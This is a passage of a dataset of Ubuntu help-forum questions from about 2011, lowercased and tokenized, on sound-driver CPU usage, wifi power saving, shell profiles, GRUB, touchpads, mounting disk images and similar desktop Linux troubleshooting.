15:58 0:00 [ kmpathd/1 ] root 56 0.0 0.0 0 0 ? s 15:58 0:00 [ kmpath_handlerd ] root 57 0.0 0.0 0 0 ? s 15:58 0:00 [ ksnapd ] root 58 0.0 0.0 0 0 ? s 15:58 0:03 [ kondemand/0 ] root 59 0.0 0.0 0 0 ? s 15:58 0:02 [ kondemand/1 ] root 60 0.0 0.0 0 0 ? s 15:58 0:00 [ kconservative/0 ] root 61 0.0 0.0 0 0 ? s 15:58 0:00 [ kconservative/1 ] root 213 0.0 0.0 0 0 ? s 15:58 0:00 [ scsi_eh_2 ] root 222 0.0 0.0 0 0 ? s 15:58 0:00 [ scsi_eh_3 ] root 234 0.0 0.0 0 0 ? s 15:58 0:00 [ scsi_eh_4 ] root 235 0.0 0.0 0 0 ? s 15:58 0:01 [ usb-storage ] root 255 0.0 0.0 0 0 ? s 15:58 0:00 [ jbd2/sda5-8 ] root 256 0.0 0.0 0 0 ? s 15:58 0:00 [ ext4-dio-unwrit ] root 257 0.0 0.0 0 0 ? s 15:58 0:00 [ ext4-dio-unwrit ] root 290 0.0 0.0 0 0 ? s 15:58 0:00 [ flush-8:0 ] root 318 0.0 0.0 2316 888 ? s 15:58 0:00 upstart-udev-bridge -- daemon root 321 0.0 0.0 2616 1024 ? s < s 15:58 0:00 udevd -- daemon root 526 0.0 0.0 0 0 ? s 15:58 0:00 [ kpsmoused ] root 528 0.0 0.0 0 0 ? s 15:58 0:00 [ led_workqueue ] root 650 0.0 0.0 0 0 ? s 15:58 0:00 [ radeon/0 ] root 651 0.0 0.0 0 0 ? s 15:58 0:00 [ radeon/1 ] root 652 0.0 0.0 0 0 ? s 15:58 0:00 [ ttm_swap ] root 654 0.0 0.0 2612 984 ? s < 15:58 0:00 udevd -- daemon root 656 0.0 0.0 0 0 ? s 15:58 0:00 [ hd-audio0 ] root 657 0.0 0.0 2612 916 ? s < 15:58 0:00 udevd -- daemon root 674 0.6 0.0 0 0 ? s 15:58 0:57 [ phy0 ] syslog 715 0.0 0.0 34812 1776 ? sl 15:58 0:00 rsyslogd -c4 102 731 0.0 0.0 3236 1512 ? ss 15:58 0:02 dbus-daemon -- system -- fork root 740 0.0 0.1 19088 3380 ? ssl 15:58 0:00 gdm-binary root 744 0.0 0.1 18900 4032 ? ssl 15:58 0:01 networkmanager avahi 749 0.0 0.0 2928 1520 ? s 15:58 0:00 avahi-daemon : running [ alexandros-laptop.local ] avahi 752 0.0 0.0 2928 544 ? ss 15:58 0:00 avahi-daemon : chroot helper root 753 0.0 0.1 4172 2300 ? s 15:58 0:00 /usr/sbin/modem-manager root 762 0.0 0.1 20584 3152 ? sl 15:58 0:00 /usr/sbin/console-kit-daemon -- no-daemon root 836 0.0 0.1 20856 3864 ? sl 15:58 0:00 /usr/lib/gdm/gdm-simple-slave -- display-id /org/gnome/displaymanager/display1 root 856 0.0 0.1 4836 2388 ? s 15:58 0:00 /sbin/wpa_supplicant -u -s root 868 2.3 1.3 36932 27924 tty7 rs+ 15:58 3:22 /usr/bin/x :0 -nr -verbose -auth /var/run/gdm/auth-for-gdm-a46t4j/database -nolisten root 891 0.0 0.0 1792 564 tty4 ss+ 15:58 0:00 /sbin/getty -8 38400 tty4 root 901 0.0 0.0 1792 564 tty5 ss+ 15:58 0:00 /sbin/getty -8 38400 tty5 root 908 0.0 0.0 1792 564 tty2 ss+ 15:58 0:00 /sbin/getty -8 38400 tty2 root 910 0.0 0.0 1792 568 tty3 ss+ 15:58 0:00 /sbin/getty -8 38400 tty3 root 913 0.0 0.0 1792 564 tty6 ss+ 15:58 0:00 /sbin/getty -8 38400 tty6 root 917 0.0 0.0 2180 1072 ? ss 15:58 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket daemon 924 0.0 0.0 2248 432 ? ss 15:58 0:00 atd root 927 0.0 0.0 2376 900 ? ss 15:58 0:00 cron root 950 0.0 0.0 11736 1372 ? ss 15:58 0:00 /usr/sbin/winbindd root 958 0.0 0.0 11736 1184 ? s 15:58 0:00 /usr/sbin/winbindd root 974 0.0 0.1 6832 2580 ? ss 15:58 0:00 /usr/sbin/cupsd -c /etc/cups/cupsd.conf root 1078 0.0 0.0 1792 564 tty1 ss+ 15:58 0:00 /sbin/getty -8 38400 tty1 gdm 1097 0.0 0.0 3392 772 ? s 15:58 0:00 /usr/bin/dbus-launch -- exit-with-session root 1112 0.0 0.1 19216 3292 ? sl 15:58 0:00 /usr/lib/gdm/gdm-session-worker root 1116 0.0 0.1 5540 2932 ? s 15:58 0:01 /usr/lib/upower/upowerd root 1131 0.0 0.1 6308 3824 ? s 15:58 0:00 /usr/lib/policykit-1/polkitd 108 1163 0.0 0.2 16788 4360 ? ssl 15:58 0:01 /usr/sbin/hald root 1164 0.0 0.0 3536 1300 ? s 15:58 0:00 hald-runner root 1188 0.0 0.0 3612 1256 ? s 15:58 0:00 hald-addon-input : listening on /dev/input/event6 /dev/input/event5 /dev/input/event2 root 1194 0.0 0.0 3612 1224 ? s 15:58 0:00 /usr/lib/hal/hald-addon-rfkill-killswitch root 1200 0.0 0.0 3608 1240 ? s 15:58 0:00 /usr/lib/hal/hald-addon-generic-backlight root 1202 0.0 0.0 3616 1236 ? s 15:58 0:02 hald-addon-storage : polling /dev/sr0 ( every 2 sec ) root 1204 0.0 0.0 3616 1236 ? s 15:58 0:00 hald-addon-storage : polling /dev/sdb ( every 2 sec ) root 1211 0.0 0.0 3624 1220 ? s 15:58 0:00 /usr/lib/hal/hald-addon-cpufreq 108 1212 0.0 0.0 3420 1200 ? s 15:58 0:00 hald-addon-acpi : listening on acpid socket /var/run/acpid.socket 1000 1222 0.0 0.1 24196 2816 ? sl 15:58 0:00 /usr/bin/gnome-keyring-daemon -- daemonize -- login 1000 1240 0.0 0.3 28228 7312 ? ssl 15:58 0:00 gnome-session 1000 1274 0.0 0.0 3284 356 ? ss 15:58 0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session gnome-session 1000 1277 0.0 0.0 3392 772 ? s 15:58 0:00 /usr/bin/dbus-launch -- exit-with-session gnome-session 1000 1278 0.0 0.0 3160 1652 ? ss 15:58 0:00 /bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session 1000 1281 0.0 0.2 8172 4636 ? s 15:58 0:00 /usr/lib/libgconf2-4/gconfd-2 1000 1287 0.0 0.5 24228 10896 ? ss 15:58 0:03 /usr/lib/gnome-settings-daemon/gnome-settings-daemon 1000 1290 0.0 0.1 6468 2364 ? s 15:58 0:00 /usr/lib/gvfs/gvfsd 1000 1293 0.0 0.6 38104 13004 ? s 15:58 0:03 metacity 1000 1296 0.0 0.1 30280 2628 ? ssl 15:58 0:00 /usr/lib/gvfs//gvfs-fuse-daemon /home/alexandros/.gvfs 1000 1301 0.0 0.0 3344 988 ? s 15:58 0:03 syndaemon -i 0.5 -k 1000 1303 0.0 0.1 8060 3488 ? s 15:58 0:00 /usr/lib/gvfs/gvfs-gdu-volume-monitor root 1306 0.0 0.1 15692 3104 ? sl 15:58 0:00 /usr/lib/udisks/udisks-daemon 1000 1307 0.4 1.0 50748 21684 ? s 15:58 0:34 python -u /usr/share/screenlets/digiclock/digiclockscreenlet.py 1000 1308 0.0 0.9 35608 18564 ? s 15:58 0:00 python /usr/share/screenlets-manager/screenlets-daemon.py 1000 1309 0.0 0.3 19524 6468 ? s 15:58 0:00 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 1000 1311 0.0 0.5 37412 11788 ? s 15:58 0:01 gnome-power-manager 1000 1312 0.0 1.0 50772 22628 ? s 15:58 0:03 gnome-panel 1000 1313 0.1 1.5 102648 31184 ? sl 15:58 0:10 nautilus root 1314 0.0 0.0 5188 996 ? s 15:58 0:02 udisks-daemon : polling /dev/sdb /dev/sr0 1000 1315 0.0 0.6 51948 12464 ? sl 15:58 0:01 nm-applet -- sm-disable 1000 1317 0.0 0.1 16956 2364 ? sl 15:58 0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor 1000 1318 0.0 0.3 20164 7792 ? s 15:58 0:00 bluetooth-applet 1000 1321 0.0 0.1 7260 2384 ? s 15:58 0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor 1000 1323 0.0 0.5 37436 12124 ? s 15:58 0:00 /usr/lib/notify-osd/notify-osd 1000 1324 0.0 1.9 197928 40456 ? ssl 15:58 0:06 /home/alexandros/.dropbox-dist/dropbox 1000 1329 0.0 0.3 20136 7968 ? s 15:58 0:00 /usr/bin/gnome-screensaver -- no-daemon 1000 1331 0.0 0.1 7056 3112 ? s 15:58 0:00 /usr/lib/gvfs/gvfsd-trash -- spawner :1.6 /org/gtk/gvfs/exec_spaw/0 root 1340 0.0 0.0 2236 1008 ? s 15:58 0:00 /sbin/dhclient -d -sf /usr/lib/networkmanager/nm-dhcp-client.action -pf /var/run/dhcl 1000 1348 0.0 0.1 42252 3680 ? ssl 15:58 0:00 /usr/lib/bonobo-activation/bonobo-activation-server -- ac-activate -- ior-output-fd=19 1000 1384 0.0 1.7 80244 35480 ? sl 15:58 0:02 /usr/bin/python /usr/lib/deskbar-applet/deskbar-applet/deskbar-applet -- oaf-activate- 1000 1388 0.0 0.5 26196 11804 ? s 15:58 0:01 /usr/lib/gnome-panel/wnck-applet -- oaf-activate-iid=oafiid : gnome_wncklet_factory -- oa 1000 1393 0.1 0.5 25876 11548 ? s 15:58 0:08 /usr/lib/gnome-applets/multiload-applet-2 -- oaf-activate-iid=oafiid : gnome_multiloadap 1000 1394 0.0 0.5 25600 11140 ? s 15:58 0:03 /usr/lib/gnome-applets/cpufreq-applet -- oaf-activate-iid=oafiid : gnome_cpufreqapplet_f 1000 1415 0.0 0.5 39192 11156 ? s 15:58 0:01 /usr/lib/gnome-power-manager/gnome-inhibit-applet -- oaf-activate-iid=oafiid : gnome_inh 1000 1417 0.0 0.7 53544 15488 ? sl 15:58 0:00 /usr/lib/gnome-applets/mixer_applet2 -- oaf-activate-iid=oafiid : gnome_mixerapplet_fact 1000 1419 0.0 0.4 23816 9068 ? s 15:58 0:00 /usr/lib/gnome-panel/notification-area-applet -- oaf-activate-iid=oafiid : gnome_notific 1000 1488 0.0 0.3 20964 7548 ? s 15:58 0:00 /usr/lib/gnome-disk-utility/gdu-notification-daemon 1000 1490 0.0 0.1 6608 2484 ? s 15:58 0:00 /usr/lib/gvfs/gvfsd-burn -- spawner :1.6 /org/gtk/gvfs/exec_spaw/1 1000 1510 0.0 0.1 6348 2084 ? s 15:58 0:00 /usr/lib/gvfs/gvfsd-metadata 1000 1531 0.0 0.3 19472 6616 ? s 15:58 0:00 /usr/lib/gnome-user-share/gnome-user-share 1000 1535 0.0 0.4 77128 8392 ? sl 15:58 0:00 /usr/lib/evolution/evolution-data-server-2.28 -- oaf-activate-iid=oafiid : gnome_evoluti 1000 1601 0.0 0.5 69576 11800 ? sl 15:59 0:00 /usr/lib/evolution/2.28/evolution-alarm-notify 1000 1604 0.0 0.7 33924 15888 ? s 15:59 0:00 python /usr/share/system-config-printer/applet.py 1000 1701 0.0 0.5 37116 11968 ? s 15:59 0:00 update-notifier 1000 1892 4.5 7.0 406720 145312 ? sl 17:11 3:09 /opt/google/chrome/chrome 1000 1896 0.0 0.1 69812 3680 ? s 17:11 0:02 /opt/google/chrome/chrome 1000 1898 0.0 0.6 91420 14080 ? s 17:11 0:00 /opt/google/chrome/chrome -- type=zygote 1000 1916 0.2 1.3 140780 27220 ? sl 17:11 0:12 /opt/google/chrome/chrome -- type=extension -- disable-client-side-phishing-detection - 1000 1918 0.7 1.8 155720 37912 ? sl 17:11 0:31 /opt/google/chrome/chrome -- type=extension -- disable-client-side-phishing-detection - 1000 1921 0.0 1.0 135904 21052 ? sl 17:11 0:02 /opt/google/chrome/chrome -- type=extension -- disable-client-side-phishing-detection - 1000 1927 6.5 3.6 194604 74960 ? sl 17:11 4:32 /opt/google/chrome/chrome -- type=renderer -- disable-client-side-phishing-detection -- 1000 2156 0.4 0.7 48344 14896 ? rl 18:03 0:04 gnome-terminal 1000 2157 0.0 0.0 1988 712 ? s 18:03 0:00 gnome-pty-helper 1000 2158 0.0 0.1 6504 3860 pts/0 ss 18:03 0:00 bash 1000 2564 0.2 0.1 6624 3984 pts/1 ss+ 18:17 0:00 bash 1000 2711 0.0 0.0 4208 1352 ? s 18:19 0:00 /bin/bash /home/alexandros/programme/teamspeak3-client-linux_x86_back/ts3client_runsc 1000 2714 36.5 1.5 210872 31960 ? sll 18:19 0:18 ./ts3client_linux_x86 1000 2743 0.0 0.0 2716 1068 pts/0 r+ 18:20 0:00 ps aux output of vmstat : alexandros @ alexandros-laptop : ~ $ vmstat procs -- -- -- -- -- -memory -- -- -- -- -- -- -swap -- -- -- -io -- -- -system -- -- -- cpu -- -- r b swpd free buff cache si so bi bo in cs us sy id wa 0 0 0 1093324 69840 449496 0 0 27 10 476 667 6 2 91 1 output of lsusb alexandros @ alexandros-laptop : ~ $ lspci 00:00.0 host bridge : silicon integrated systems [ sis ] 671mx 00:01.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:02.0 isa bridge : silicon integrated systems [ sis ] sis968 [ mutiol media io ] ( rev 01 ) 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 [ ide ] ( rev 01 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:05.0 ide interface : silicon integrated systems [ sis ] sata controller / ide mode ( rev 03 ) 00:06.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:07.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:0d.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 00:0f.0 audio device : silicon integrated systems [ sis ] azalia audio controller 01:00.0 vga compatible controller : ati technologies inc mobility radeon x2300 02:00.0 ethernet controller : atheros communications inc. ar5001 wireless network adapter ( rev 01 ) the team speak log file : 2011-06-19 19:04:04.223522|info | | | logging started , clientlib version : 3.0.0-rc2 [ build : 14642 ] 2011-06-19 19:04:04.761149|error |soundbckndintf| | /home/alexandros/programme/teamspeak3-client-linux_x86_back/soundbackends/libpulseaudio_linux_x86.so error : not_connected 2011-06-19 19:04:05.871770|info |clientui | | failed to init text to speech engine 2011-06-19 19:04:05.894623|info |clientui | | teamspeak 3 client version : 3.0.0-rc2 [ build : 14642 ] 2011-06-19 19:04:05.895421|info |clientui | | qt version : 4.7.2 2011-06-19 19:04:05.895571|info |clientui | | using configuration location : /home/alexandros/.ts3client/ts3clientui_qt.conf 2011-06-19 19:04:06.559596|info |clientui | | last update check was : sa . jun 18 00:08:43 2011 2011-06-19 19:04:06.560506|info | | | checking for updates ... 2011-06-19 19:04:07.357869|info | | | update check , my version : 14642 , latest version : 14642 2011-06-19 19:05:52.978481|info |preprospeex | 1| speex version : 1.2rc1 2011-06-19 19:05:54.055347|info |uihelpers | | setclientvolumemodifier : 10 -8 2011-06-19 19:05:54.057196|info |uihelpers | | setclientvolumemodifier : 11 2 thanks for taking the time to read my message . update : thanks to nickguletskii 's link i googled for `` alsa cpu usage '' ( without quotes ) and it brought me to a forum . a user wrote that by directly selecting the hardware with `` plughw : x.x '' wo n't impact the performance of the system . i have selected it in the ts 3 configuration and it worked . but this solution is not optimal because now no other program can access the sound output . update # 2 i followed nickguletskii 's solution and created a .asoundrc file in my home folder . now things are getting even worse , the cpu usage is now at 50 % : -o. contents of my ~./asoundrc alexandros @ alexandros-laptop : ~ $ cat /home/alexandros/.asoundrc pcm . ! default { type plug slave.pcm { type dmix ipc_key 1024 slave { pcm `` hw:0,0 '' rate 44100 } } } i checked that i access the correct device from my ts3 configuration . when i directly select the device the cpu usage is at 2 % . when i select `` standart '' it goes now up to 50 % . i do n't know what i am doing wrong . update # 3 i switched the rate down to 22050 but still no difference to 44100 . cpu usage is at 50 % . if you need any further information or my question is unclear than please tell me .
48915	intel wifi 6230 slows down when cable unplugged	i 've just purchased a dell l502x with an intel 6230 wifi . i 've installed ubuntu 11.04 64 bit . it works , but when i use only the battery the connection slows down ( my maximum download is 800kb and when my dell is unplugged it goes down to 200kb ) . i think that is a sort of power saving , but how can i manage that ? anybody knows something about that ? thank you !
48917	what could be a reason for `.bash_profile` and `.bashrc` not to execute the exports ?	the cuda installation tutorial tells me to add the following two lines to my .bash_profile . export path=/usr/local/cuda/bin : $ path export ld_library_path=/usr/local/cuda/lib64 : $ ld_library_path but it does not work ( tm ) . even if i add these lines to .bash_profile and .bashrc , i still have to enter the exports manually , for the paths to be found . so my question . what could be a reason for .bash_profile and .bashrc not to load/execute the exports ? thanks ! ! p.s . i ssh into the machine and it is , apart from the cuda drive and sdk , a fresh ubuntu 10.10 installation . p.p.s . the fresh installation did not have a .bash_profile in the first place . nano ~/.bash_profile was empty
48918	file explorer crashing in kubuntu 11.04	when i click on home folder under places , or if i try to open the explorer it always crashes and does not open . any pointers would be helpful .
48919	trouble accessing sites with chromium	i 'm having trouble accessing www.fafsa.ed.gov with chromium , i get an `` incompatible browser detected '' message . i tried using the `` user agent switcher '' extension for chrome but it did not work , however firefox 4 and their own `` user agent switcher '' extension did work . i prefer chromium , but being a student , this is a bit of a `` deal breaker '' for me . i figured i 'd ask before i made the switch to fx4 !
48920	getting error with spell check in nano	i am getting the following error while doing spell check in nano editor . please help to resolve this . spell checking failed : error invoking `` spell '' : bad file descriptot
48922	how to align twinview monitors with different resolutions and prevent mouse disappearing into dead areas ?	i 'm using two monitors of different brands and resolutions with nvidia twinview , which works well enough , but one thing that 's getting to me is how the mouse can move off the edge of the visible screen space below the left-hand screen and above the right-hand screen ( see screenshot ) . it makes it much more difficult to hit buttons at the bottom/top of each screen , since the cursor just disappears off the edge . is there a way of changing this behaviour ?
48932	install acire and python snippets	i 'm trying to install acire and python snippets in ubuntu 11.04 ( 64-bit ) . i have successfully installed acire , but i 'm unable to install the python-snippets package . both ppa 's have been added to my sources list , but when i run sudo apt-get update , i get the error : w : failed to fetch http : //ppa.launchpad.net/python-snippets-drivers/python-snippets-daily/ubuntu/dists/natty/main/binary-amd64/packages 404 not found what should i do to install python-snippets ?
48933	how do i get multitouch working on the touchpad on a sony vaio vpc-f11 ?	i have natty running fine in my sony vaio vpc-f11 series laptop . i tried out the instructions in this page . now i have my touchpad configured as a generic mouse . so the vertical scrolling works fine . but i would like to have multi-touch features enabled . questions are as follows : what do i do to get my touchpad recognized as a touchpad rather than the mouse ? or how do i reverse the command i did as per the webpage above ? how do i get multi-touch to work ? none of the pointing devices options seemed to work in the first place ... which is why i tried out the instructions in the link posted above . i am listing my xinput list to clarify my situation : root @ aum : /sys/devices/platform/sony-laptop # xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ hid 1267 : c002 id=10 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 generic wheel mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ sony vaio keys id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ uvc camera ( 064e:2100 ) id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] any help would be appreciated ..
48935	touch monitors for ubuntu ?	i 'm looking for a touchscreen monitor that is at least 19 inches diagonally and is fairly cheap ( hopefully a similar price to the windows 7 touch monitors made by hp , dell , planar , etc. , which are $ 200 to $ 400 ) , and obviously ubuntu compatible . i saw a couple videos on youtube of ubuntu touch monitors working beautifully , even on 11.04 . if you know of any ways to make one of these or where to find one , even if it does n't adhere to the description , please let me know .
48936	pptp vpn with certificate	i want to connect to a windows pptp vpn server which accepts only connections with a ca certficate . from windows im able to do it easily ( since its windows of course and native supported ) but from my ubuntu 10.04 im not able to setup the vpn to authenticate using a certificate . any help ? thanks
48937	titanium sdk gives a `` file too short '' error	i 'm using ubuntu 11.04 and recently installed appcelerator titanium studio version 1.7 when i load up a demo project to run , i get an error like this , could n't load file : /home/dananjaya/.titanium/runtime/linux/1.1.0/libkhost.so , error : /home/dananjaya/.titanium/runtime/linux/1.1.0/libwebkittitanium-1.0.so.2 : file too short am i missing some dependencies here or is it a bug in the application ? thanks in advance .
48938	how can i import audiobooks as audiobooks ( not music ) ?	i have some audiobooks in my audiobooks folder ( ~/audiobooks ) . when importing them i follow this process : i click audiobooks in the left hand pane . i right click on audiobooks and click 'import media ... ' i choose to import from folders then go into my audiobooks folder and click 'import' it imports the audiobooks fine but into music so i drag and drop them into audiobooks - this causes them to be in both music and audiobooks i delete them from music in banshee and from ~/music ( because i use these settings : and banshee is copying them to ~/music ) i now have the audiobooks in audiobooks in the banshee library and stored in ~/audiobooks but the audiobooks in banshee do n't play . it seems that banshee thinks they are still in ~/music . how can i fix this problem ?
48941	is it possible to give two ip addresses for the same host name ?	i want to give two ip addresses for same host name . like in /etc/hosts file : xx.x.x.x example # if system is connected to dhcp y.y.yy.y example # if system is connected to vpn so is it possible ?
48946	ca n't get menus to show up in custom indicator	i am trying to get a menu to show in a custom application written in c. i create the gtkmenu , populate it with gtkmenuitem ( s ) and add it to the indicator , which shows up in the indicator list , but the menu does n't . i feel kinda silly asking this since i 'm sure i 'm just overlooking something but i 'll use as an excuse the fact that i 'm tired since it 's kinda late here . thanks in advance for any help . int main ( int argc , char *argv [ ] ) { appindicator *indicator ; gtkwidget *indicator_menu ; gtkwidget *quitmenuitem ; gtk_init ( & argc , & argv ) ; indicator_menu = gtk_menu_new ( ) ; quitmenuitem = gtk_menu_item_new_with_label ( `` exit '' ) ; g_signal_connect ( g_object ( quitmenuitem ) , `` activate '' , g_callback ( gtk_main_quit ) , null ) ; gtk_menu_append ( indicator_menu , gtk_menu_item_new_with_label ( `` entry1 '' ) ) ; gtk_menu_append ( indicator_menu , gtk_menu_item_new_with_label ( `` entry2 '' ) ) ; gtk_menu_append ( indicator_menu , gtk_separator_menu_item_new ( ) ) ; gtk_menu_append ( indicator_menu , quitmenuitem ) ; indicator = app_indicator_new ( `` test-client '' , `` user-offline '' , app_indicator_category_application_status ) ; app_indicator_set_status ( indicator , app_indicator_status_active ) ; app_indicator_set_attention_icon ( indicator , `` indicator-messages-new '' ) ; app_indicator_set_menu ( indicator , gtk_menu ( indicator_menu ) ) ; //gtk_widget_show ( indicator_menu ) ; gtk_main ( ) ; return 0 ; }
48949	folder synchronization via lan	i am looking for an application that is like dropbox . i simply would like to synchronize my music folder ( which is 100 gb ) via lan between my desktop & laptop . ( you can see why i can not use dropbox for there is the size restriction and it will try to upload a bus load of files to its central server )
48951	keep windows from jumping workspaces when they request focus	when a window requests focus while it is on a different workspace , it will jump to my current workspace . how do i prevent this from happening ?
48955	how can i configure a specific usb mouse model as left-handed ?	i use a right-handed usb mouse in the office and a left-handed usb mouse at home on the same ubuntu 11.04 laptop . how can i configure the one at home to be automatically set up to left-handed when plugged in ?
48959	mount raw dd images using gui/nautilus the same way as an iso file ( double-click , no sudo , eject button , etc )	i have some raw partition images created using dd this way : dd if=/dev/sdxy of=/path/file.img i know i can mount them using : sudo mkdir /media/mountpoint sudo mount -o loop /path/file.img /media/mountpoint but ... is there any easier way ? i would like to have the same functionaly and ease-of-use as nautilus handles .iso cd/dvd images , which is : double click to mount it shows up in desktop and in nautilus left panel auto-detects filesystem ( as mount does ) no need of sudo or administrator privileges no need to pre-create a mountpoint folder ( or to delete it afterwards ) handy `` eject '' button to unmount ive tried renaming the images as .img , .bin , .iso , with no sucess . also tried configuring opwn with > archive mounter , and it didnt work . how can i do that ?
48960	livecd wo n't boot 11.04	i bought a brand new computer yesterday ( toshiba satellite pro l770-10t : intel core i5 2410m , 2,3 ghz , 4096 mo ram , nvidia geforce gt 525m ) that simply wo n't boot any livecd i tried . i am using debian/ubuntu for a long time but this is the first time i ca n't boot a livecd here is what i tried without success : ubuntu 11.04 i386 and x64 both desktop and alternate debian stable livecd old working ubuntu livecds including 8.x 9.x 10.x on ubuntu-10.04.2-desktop-i386.iso i had a kernel panic on 11.04 packages were corrupted although md5 and sha1 were correct i must add that those were burned on different cds cd-r or cd-rw . any help would be greatly appreciated ! thanks in advance
48963	terminal : overlapping text	i have written a tcp/ip chat program but i have a problem . on client program while user writing message , a background thread receives messages from an other client and writes the message to terminal . the problem arises when client starts typing message and before he/she presses the return key incoming message overlaps the message . how can i prevent this . is it possible to write incoming message without overlapping the message being written ?
48965	dell vostro 1510 ca n't connect to wireless -- how can i fix this ?	i 'm having some trouble with my dell vostro 1510 . i installed wubi on it two days ago and i 've only been able to use the internet with an ethernet cable . the network seems to definitely recognize that the wireless -- even other peoples ' wireless -- is there , but it ca n't manage to get on . i 'll post the lpsci here , so that you can see the broadcom card i 'm working with . i have downloaded the kernel 2.6.39-0-generic , which does n't appear to have done a lick of work . 06:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 )
48969	where is my ubuntu one ribbon ?	i 'm not seeing the ubuntu one ribbon in nautilus-elementary . i have the nautilus-terminal extension as well , so i do n't know if they do n't work together . i tried running nautilus from the terminal ( for a separate issue ) , and i think i might be onto something . it seems the ubuntu one ribbon is not finding something ( it had an exception ) . i got the ne-terminal working again by deleting the gconf directory for nautilus .
48971	compiz and clearlooks window border breaks active/inactive title bars	when i turn on compiz with the compiz tray switcher and i use clearlooks , dust sand , or possibly any title bar style that normally has window icons on right , some window title bars will not change . instead , they stay selected or unselected randomly . some windows , like ubuntu software center and ccsm are unaffected . this problem only happens with gtk window manager . i am using the malteworld compiz ppa for emerald . the problem does not happen with plain metacity , or a title bar style that normally has close button on right . edit : it still happens with emerald . reinstalled with upgrade option ( yeah , 11.04 to 11.04 ) and still same problem . so maybe faulty package ?
48972	how can i change the percent of screen brightness that changes every time i press the shortcut ?	when i press fn+f6 the change in brightness is too big . how can i make it move less than it does now ? ( let 's say , half that , for example . ) ( 11.04/gnome . i 'm on proprietary nvidia drivers . ) edit : i have n't tried what rinzwind has written below because , after throwing a cup of coffee on my laptop , my keyboard was destroyed ( so i no longer have the fn button that is needed - i 'm currently writing from an external one ) . i have already ordered a new one and i will collect it from the service center tomorrow at noon
48979	how to 'expo ' one big wall with dual monitors	with dual monitors , when i use the expo , it clones repeating itself in each monitor . with 10.10 i solved this with the option 'one big wall ' but this does n't work on 11.04 i have a nvidia 560ti with proprietary drivers .
48980	grub only finding the first 26 drives	installing grub2 fails on my system ( 10.4 64bit ) with : /usr/sbin/grub-probe : error : can not find a grub drive for /dev/sdaq1 . check your device.map . checking device.map , it only lists hd0 to hd25 corresponding to sda to sdz . recreating the device map produces the same result . how do i get grub to recognize /dev/sdaq1 . note : the machine has many , many devices ; sdaq is the correct drive .
48982	how can i connect usb printer in virtual box ose win xp	how can i connect usb printer in win xp installed within virtualbox ose . help also needed to connect any usb device in above set-up . i use ubuntu 10.10 .
48983	installed ubuntu but ca n't enable unity	i have recently installed ubuntu 11.04 for the purpose of testing the new unity interface , however ; i can not boot into unity , all i get is gnome . i have goggled this and read many forums , but there seems to be nobody with simple instructions on how to enable unity . can anyone help me get unity working on my ubuntu installation ?
48984	best way to install ruby 1.9 , rails 3 , postgres , heroku , github , using rvm ?	best way to install ruby 1.9 , rails 3 , postgres , heroku , github , using rvm can anyone suggest me the way in which should i follow to install it properly , because previously i felt in various dependencies issues . suggest something it 's urgent ! ! !
48986	monodevelop crashing on startup	i am receiving the following message when trying to launch monodevelop from the command line . `` unhandled exception : system.typeloadexception : a type load exception has occurred . '' when i attempt to load monodevelop from the unity launcher , it 's almost as if nothing occurs . i am running ubuntu 11.04 ( and unity as stated above ) . any ideas would be greatly appreciated .
48988	i installed on a wd passport usb driver ; how can i get grub to work correctly ?	i 'm pretty new to ubuntu , and installed natty ( 32-bit , because it was recommended ) soon after it came out . the installation process chose to put natty onto an external usb hard drive , a 500 mb wd passport , which i liked ( it would n't interfere with my windows partition that way ) . however , at boot , the computer boots directly into windows unless i press f12 ( on my dell ) to choose boot options , and then select to boot into the passport . then i get grub and select to boot into ubuntu . i do n't really mind this ; it seems obvious that grub was installed onto the passport . no big deal . but i just recently installed 64-bit natty onto the passport , choosing the option to `` upgrade ubuntu 11.04 to ubuntu 11.04 . '' it went well , most of my settings were saved ( and all of my data ) , but it seems to have installed another instance of grub . now , when i boot the computer , i have to press f12 to select the passport ( as i did before ) , then select `` earlier versions of ubuntu '' in grub , at which time another grub screen comes up which allows me to choose the right os ( the 64-bit version ) . i do n't mind selecting the passport , but after that i 'd rather have one grub screen , not two in a row . how do i do this ? mdk @ tabasco : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe49667b6 device boot start end blocks id system /dev/sda1 1 5 40131 de dell utility /dev/sda2 6 1918 15358976 7 hpfs/ntfs /dev/sda3 * 1918 35363 268649893+ 7 hpfs/ntfs /dev/sda4 35363 60802 204334080 f w95 ext 'd ( lba ) /dev/sda5 35363 60802 204333056 7 hpfs/ntfs disk /dev/sdb : 500.1 gb , 500074283008 bytes 201 heads , 9 sectors/track , 539915 cylinders units = cylinders of 1809 * 512 = 926208 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 